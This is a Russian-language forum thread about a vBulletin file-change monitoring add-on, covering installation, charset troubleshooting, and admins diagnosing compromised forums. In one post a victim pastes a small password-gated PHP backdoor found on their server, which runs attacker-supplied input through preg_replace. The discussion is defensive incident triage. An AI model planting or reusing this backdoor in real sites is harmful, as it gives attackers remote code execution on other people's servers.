Хак инспектор файлов для vBulletin

B

Boss3

#1
Хак инспектор файлов для vBulletin - чудо хак для безопасности вашего форума. Как только вы сами или какой перец загрузит новые файлы к вам в директорию форума - на почту придет письмо со списком этого файла :D

Ну а дальше мочить. Или себя или хакера :D

Установка:

  • Заливаем файлы из папки upload
  • Импортируем продукт в своей кодировке
  • Настраиваем в админке юзера который может смотреть файлы

Все ;)
 
X

xtwin

#2
Проблемы с кодировкой в "инспекторе файлов"

Установил инспектор файлов, установил продукт от него, захожу в Установленные продукты и в заголовке и описание одни знаки вопроса. Такие же знаки вопроса, если зайти в сам инспектор файлов в навигации. Подскажите в чем дело. :(
 
S

Sayf

#3
Первое что приходит в голову: не той кодировки установили продукт. Проверьте Вашу кодировку на сайте и кодировку продукта.
 
X

xtwin

#4
Sayf написал(а):
Первое что приходит в голову: не той кодировки установили продукт. Проверьте Вашу кодировку на сайте и кодировку продукта.
Нажмите для раскрытия...

Я пробовал разные кодировки, но эффект такой же ((( Только знаки вопросы толще становились (((

Добавлено через 13 минут
Может зависит от того откуда я скачал форум? Скачивал от сюда http://5md.ru/ версию 3.8.7
 
W

Wmboard

#5
xtwin написал(а):
Может зависит от того откуда я скачал форум?
Нажмите для раскрытия...
В данном случае не зависит.
Дело в вашей базе данных, скорее всего у вас там кодировка таблиц в latin.
Посты перенес в тему хака.
 
Л

Льюви

#6
xtwin написал(а):
Может зависит от того откуда я скачал форум?
Нажмите для раскрытия...
если есть сомнения - зачем качать?
качайте с проверенных источников

не поленилась, качнула и дистрибутив, и русик
простое сравнение длины файлов различий нЕ выявило

вывод: проблема таки с кодировкой у Вас...
 
X

xtwin

#7
Veter написал(а):
В данном случае не зависит.
Дело в вашей базе данных, скорее всего у вас там кодировка таблиц в latin.
Посты перенес в тему хака.
Нажмите для раскрытия...

А как мне сделать, что бы этих знаков вопросов не было?
 
W

Wmboard

#8
Если форум только установлен, то проще всего все снести, в том числе и БД полностью и сделать заново.
Если форум уже рабочий, то есть там есть реальные люди, темы, посты, то нужно разбираться с кодировками базы данных. Отключать все хаки. Приводить все таблицы к единой кодировке cp или utf
 
X

xtwin

#9
Veter написал(а):
Если форум только установлен, то проще всего все снести, в том числе и БД полностью и сделать заново.
Если форум уже рабочий, то есть там есть реальные люди, темы, посты, то нужно разбираться с кодировками базы данных. Отключать все хаки. Приводить все таблицы к единой кодировке cp или utf
Нажмите для раскрытия...

Удалил все базы данных и поставил заново форум и первым делом установил этот хак - тоже самое ((( кодировка базы utf. Помогите это исправить, плиз ))
 
Н

Ночная странница

#10
xtwin, у меня тоже UTF, но хак ставила без проблем... Часто хаки просто выявляют проблемы с кодировками, если они есть.
Вы в БД глядели? В какой кодировке таблицы? Есть в темах (таблица post) кракозябры? не на форуме, а в самой БД. Можно так же глянуть бекап любой...

Добавлено через 2 минуты
xtwin, есть еще один момент...

Перезалила вложения в первом посте, там были файлы с кириллицей и в cp1251
 
X

xtwin

#13
Ночная странница написал(а):
xtwin, у меня тоже UTF, но хак ставила без проблем... Часто хаки просто выявляют проблемы с кодировками, если они есть.
Вы в БД глядели? В какой кодировке таблицы? Есть в темах (таблица post) кракозябры? не на форуме, а в самой БД. Можно так же глянуть бекап любой...

Добавлено через 2 минуты
xtwin, есть еще один момент...

Перезалила вложения в первом посте, там были файлы с кириллицей и в cp1251
Нажмите для раскрытия...

В БД кодировка таблиц ср1251_general_ci. Может в этом дело?

Добавлено через 13 минут
Забыл дописать, в таблице пост кракозябры ((((( Помогите это исправить
 
W

Wmboard

#14
Значит ваша таблица не в ср1251_general_ci а в latin.
В phpMyAdmin поменяйте кодировку именно этой таблицы где крокозябры.
 
W

Wmboard

#16
Хм...
В картинках пока не могу показать. Может чуть позже, как время появится.
Попробуйте вывести кодировку форума принудительно. Если ??? исчезнут, то можно использовать как временную меру. Но с БД все равно разбираться нужно.

Открываете конфиг. Где то ближе к концу находите закомментированную строку
Код: 
//$config['Mysqli']['charset'] = 'utf8';

Добавляете ниже

Код: 
$config['Mysqli']['charset'] = 'cp1251';

Если ??? не исчезнут обновите продукт и посмотрите.
 
X

xtwin

#17
Проблема решилась )))) Всем огромное спасибо ))))
 
L

lukamal

#18
Расскажите как решили проблему?
 
X

xtwin

#19
lukamal написал(а):
Расскажите как решили проблему?
Нажмите для раскрытия...

Конечно ))) Перед установкой форума, создал базу данных, выбрал ее и в сравнении указал ut8_general_ci, затем раскомментил строчку в конфиге c utf8, после установки сразу же залез в настройки английского языка и изменил кодировку с iso на utf8 )) Все )))) Конечно, я бы в жизни не догадался решить проблему, мне помог Sven с вбсаппорта )))
 
A

Allex1

#20
Спс.
Кое что не понял:

1. Инспектор выдал гору файлов, у всех владелец 2737, права 0644. Дата создания = дате бэкапа. Вроде все бэкапы подтирал.
Ничего страшного, если я всё это
сотру?

accessmask.php
18,82K 12/01/13 19:06 2737 0644
admincalendar.php
38,58K 12/01/13 19:06 2737 0644
admininfraction.php
48,41K 12/01/13 19:06 2737 0644
...


2. Как эти файлы стирать быстро, не выискивая по каталогам?
 
A

Allex1

#23
Подскажите, плиз, что за файлик появился, надо ли его удалять?

Инспектор файлов на Юридический клуб arbitraz.ru (http://arbitraz.ru/misc.php?do=gfi) обнаружил изменения в списке файлов.

Обнаружено новых файлов: 1

/cpstyles/vBulletin_3_Frontend/cp_tick_no.php (134,00b, 12/01/13 19:07, 2737, 0644)

Изменено файлов: 0
 
W

Wmboard

#24
Новые стили админки загружали?
 
W

Wmboard

#26
При чем здесь разделы? Файл появился в папке /cpstyles. Поэтому я и сделал вывод, что вы загружали какой то стиль админки.
 
П

Прометей

#27
Allex написал(а):
Инспектор файлов на Юридический клуб arbitraz.ru (http://arbitraz.ru/misc.php?do=gfi) обнаружил изменения в списке файлов.

Обнаружено новых файлов: 1

/cpstyles/vBulletin_3_Frontend/cp_tick_no.php (134,00b, 12/01/13 19:07, 2737, 0644)
Нажмите для раскрытия...
Что за файл в стиле Админки Frontend Вашего форума cp_tick_no.php? Вот его Инспектор файлов и обнаружил. Он есть в дистрибутиве стиля? Если его не было - к вам залили шелл. Проверяйте этот файл.
 
A

Allex1

#28
Прометей написал(а):
Что за файл в стиле Админки Frontend Вашего форума cp_tick_no.php? Вот его Инспектор файлов и обнаружил. Он есть в дистрибутиве стиля? Если его не было - к вам залили шелл. Проверяйте этот файл.
Нажмите для раскрытия...

В дистре не было.
Вот его содержимое:
<?php
if (md5($_POST['p']) == 'ad5fdc193226be1841c53825d7004925') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}


Для шела не много.
Проверил с помощью virustotal точка com. Ничего подозрительного.

Как узнать, когда, кто и с какого IP его закачал?
И как можно закачивать файлы без доступа на ftp или http?
 
W

Wmboard

#31
У вас шаред хост? Обратитесь к хостеру, он подскажет где у него хранятся логи.
 
M

Magius1

#32
Подскажите пожалуйста кто-нибудь как Импортируем продукт?
Boss написал(а):
Импортируем продукт в своей кодировке
Нажмите для раскрытия...
С админкой vBulletin не знаком к сожалению, да и вообще еще новичок я в этом деле. А очень нужно, заражают гады мой новый форум (((
 
Л

Льюви

#33
Magius написал(а):
заражают гады мой новый форум (((
Нажмите для раскрытия...
О_о...
то есть, на форуме в принципе не установлено ни одного хака, а его уже успешно ломают?
я бы задумалась... что-то тут не так, и инспектор файлов явно не поможет
версия движка какая?
 
M

Magius1

#34
Льюви написал(а):
то есть, на форуме в принципе не установлено ни одного хака
Нажмите для раскрытия...
Форум купил недавно и понятия не имею как устроен двиг. Судя по всему ни одного не установлено, а ломают успешно. Версия 3.8.7 PL3

Полазил по админке. Оказывается установлены "vB.Sponsors" и "Особые форумы"
Я уже проделал все манипуляции по устранению уязвимостей, как описано в теме "Как защитить форум на vBulletin". Осталось только установить инспектор файлов.
 
W

Wmboard

#35
Magius написал(а):
Подскажите пожалуйста кто-нибудь как Импортируем продукт?
Нажмите для раскрытия...
Заходим в панель администратора.
Продукты и модули - управление продуктами - добавить (импортировать) продукт.


Magius написал(а):
Судя по всему ни одного не установлено
Нажмите для раскрытия...
Админка, продукты и модули, и увидите список установленного.


Magius написал(а):
Осталось только установить инспектор файлов.
Нажмите для раскрытия...
Инспектор файлов НЕ защищает форум, и очень часто НЕ уведомляет о взломах. Потому что ломают не добавлением файлов, а другими путями. Инспектор файлов видит лишь добавляемые файлы и все.
 
Л

Льюви

#37
Magius написал(а):
Форум купил недавно
Нажмите для раскрытия...
оу...
то есть, не Вы ставили движок, а получили готовое...
возможно, в комплекте с шеллами...
3.8.7 - стабильна и не имеет нареканий с точки зрения безопасности
что такое "Особые форумы"?

Magius написал(а):
а ломают успешно
Нажмите для раскрытия...
можете рассказать, в чём это выражается?
 
M

Magius1

#38
Похоже, что проблема решилась.

Прошлый владелец форума продал его по той причине, что его постоянно ломали. Я подробностей не знаю, однако цена была заманчива =)
Льюви написал(а):
возможно, в комплекте с шеллами...
Нажмите для раскрытия...
Сразу после покупки слил все файло себе и проверил касперским, который ругался на один файл (Trojan.Script.Generic в private_html/index.html) этот файл я удалил. Далее вручную сравнил все файлы на сервере с файлами движка и шеллов не обнаружил. Есть только парочка отличий в некоторых php-кодах (вероятно, что правил прошлый владелец форума)
Льюви написал(а):
что такое "Особые форумы"?
Нажмите для раскрытия...
Я зашел в "Управление продуктами" и там обнаружил "Особые форумы 0.1 Форум, содержащий все темы или темы из выбранного раздела" а что это сам не знаю.
Льюви написал(а):
можете рассказать, в чём это выражается?
Нажмите для раскрытия...
Mozilla предупреждала о заразности сайта и Гугл добавил в список подозрительных ("На 2 из 4 страниц сайта, протестированных нами за последние 90 дней, происходила загрузка и установка вредоносного ПО без согласия пользователя.") Гугл считал зараженным файл vbulletin_read_marker.js а он был чист. И что я только не делал - найти зверя не удавалось. Всевозможные сервисы поиска вирусов сообщали, что сайт чист.

А сегодня, к моему удивлению гугл снял предупреждение о "заразности" сайта.
 
Л

Льюви

#39
Magius написал(а):
"Особые форумы 0.1 Форум, содержащий все темы или темы из выбранного раздела"
Нажмите для раскрытия...
понятно

Magius написал(а):
Гугл считал зараженным файл vbulletin_read_marker.js а он был чист. И что я только не делал - найти зверя не удавалось.
Нажмите для раскрытия...
мммммм......
был у меня как-то клиент с похожей проблемой
я тоже долго искала, где там собака порылась
по клику на иконку раздела вместо отметки "раздел прочитан" (а это как раз этот скрипт) открывался порно-попандер
"зверь" сидел в замещаемых переменных

в общем, если будут опять проблемы - стукните в ЛС, если не буду сильно занята, смогу глянуть
 
M

Magius1

#40
Спасибо большое Льюви!!!

Последний маленький вопросик. Как настроить инспектор файлов? То, что в первом посте на 3-м скриншоте - как туда попасти?
 
W

Wmboard

#41
Админка, основные настройки, инспектор файлов :pardon:

После установки любого хака нужно прежде всего посмотреть его в основных настройках.
 
A

Allex1

#42
В графу: "Список через запятую расширений файлов, которые необходимо включать в список проверки

phtml,php,php3,php4,php5,cgi,pl,shtml,xml"

желательно добавить js.

основание
Антивирус avast обнаружил Заражение: JS:Includer-APO [Trj]
URL: http://arbitraz.ru/cpstyles/vBulleti...ult/branson.js
Данный файл ссылался на vbulletin_global.js
js по умолчанию не проверяется
 
A

Allex1

#43
Подскажите, плиз, братцы, есть ли средство для фильтрации записей, або аналогичный продукт.
Причины:
1. Проверять записи за несколько лет тяжело.
2. Хакеры, в ходе одной из последних атак, умудрились изменить атрибуты инфицированного файла, установив более раннюю дату создания.
 
К

креш

#44
Для 4.2.0 подходит этот хак ?
 
Get involved!

Here you can only see a limited number of comments. On СЕО Форум Вебмастеров you see all comments and all functions are available to you. To the thread